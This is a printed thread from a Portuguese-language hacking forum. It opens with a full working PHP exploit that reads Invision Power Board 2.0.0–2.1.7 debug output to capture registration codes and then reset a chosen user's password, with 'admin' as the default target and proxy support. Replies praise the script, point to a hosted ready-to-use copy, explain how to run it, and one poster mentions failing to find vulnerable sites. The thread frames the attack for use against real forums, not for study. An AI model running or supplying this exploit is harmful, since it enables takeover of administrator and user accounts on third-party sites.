Print Page - Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit

Title: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: insanity on 01 de November , 2006, 02:31:16 PM

Code Select

<?php
/*

 Debug Mode password change vulnerability
 Affects Invision Power Borard 2&#46;0&#46;0 to 2&#46;1&#46;7
 by Rapigator
 
 This works if&#58;

 "Debug Level" is set to 3
 or
 Enable SQL Debug Mode is turned on
 
 In General Configuration of the forum software&#46;

*/

// The forum's address up to and including 'index&#46;php'
$site = "http&#58;//localhost/forums/index&#46;php";

// An existing user's login name
$name = "admin";

// The new password(3-32 characters)
$pass = "1234";

// You can use a proxy&#46;&#46;&#46;
// $proxy = "1&#46;2&#46;3&#46;4&#58;8080";



// -----------------------------
$site &#46;= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site&#46;'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w&#93;*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;*?),/', $page, $regs)) {
	$prefix = $regs[1&#93;;
	$regid = $regs[2&#93;;
	$regcode = $regs[3&#93;;
} else {
	$suffix = "&debug=1";
	$curl = curl_init($site&#46;'act=Reg&CODE=10'&#46;$suffix);
	curl_setopt($curl, CURLOPT_PROXY, $proxy);
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($curl, CURLOPT_TIMEOUT, 10);
	$page = curl_exec($curl);
	curl_close($curl);
	if (preg_match('/INSERT INTO ([\\w&#93;*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;*?),/', $page, $regs)) {
		$prefix = $regs[1&#93;;
		$regid = $regs[2&#93;;
		$regcode = $regs[3&#93;;
	}
}
if (!isset($regid) || !isset($regcode)) {
	echo "Error&#58; Probably not vulnerable, or no forum found";
	exit;
}

$curl = curl_init($site&#46;$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'&#46;$prefix&#46;'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;{1,32}?),/', $page, $regs)) {
	change_pass($regcode,$regid,$regs[1&#93;,$regs[2&#93;);
}
if (preg_match('/INSERT INTO '&#46;$prefix&#46;'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;{1,32}?),/', $page, $regs)) {
	change_pass($regcode,$regid,$regs[1&#93;,$regs[2&#93;);
}

function change_pass($regcode,$regid,$vid,$userid) {
	global $site, $proxy, $name, $pass;
	$curl = curl_init($site&#46;$suffix);
	curl_setopt($curl, CURLOPT_PROXY, $proxy);
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($curl, CURLOPT_POST, 1);
	curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
	curl_setopt($curl, CURLOPT_TIMEOUT, 10);
	$page = curl_exec($curl);
	curl_close($curl);
	echo "Password Changed!";
	exit;
}
?>

# milw0rm.com [2006-11-01]

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Fvox on 11 de November , 2006, 02:51:42 PM

Muito bom kra!

O wuefez tinha me passado jah o link do site:
http://www.runescapebr.com/ipb.php (http://www.runescapebr.com/ipb.php)

mas nem sei se ele tinha a source

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Anonymous on 12 de December , 2006, 09:08:05 AM

Muito bom!...

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Security on 13 de December , 2006, 12:23:46 AM

mto bom insanity nice

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: RT on 13 de December , 2006, 02:42:43 AM

Realmente, muito bom mesmo..
Boa insanity

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: TEAM on 08 de January , 2007, 11:27:03 PM

cara sako nada disso mais to querendo aprende onde eu coloko esse codigo tem que baixa algo?

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Sladrak on 09 de January , 2007, 12:48:07 AM

Quote from: "TEAM"cara sako nada disso mais to querendo aprende onde eu coloko esse codigo tem que baixa algo?

Se vc entrar neste site http://www.runescapebr.com/ipb.php (http://www.runescapebr.com/ipb.php) terá o exploit pronto para ser usado, como disse nosso amigo Fvox e Wufez.
Mas para coloca-lo funcionando vc teria que hospeda-lo em um servidor que desse suporte a PHP...

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: TEAM on 09 de January , 2007, 12:54:20 AM

ah.. se eu achar algum host para hospedar http://www.runescapebr.com/ipb.php (http://www.runescapebr.com/ipb.php)

eu hosteio e tal ai e so colokar a url do site dps o login dps a senha??

Mas e esse codigo que o cara passou ai?
ta dentro desse site?

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: fast on 23 de January , 2007, 05:41:19 AM

nao consegui axar NENHUM site vul :S , procurei bastante..

Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Anonymous on 03 de February , 2007, 10:04:42 PM

Good Topic^^ :)

FORUM DARKERS

Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: insanity on 01 de November , 2006, 02:31:16 PM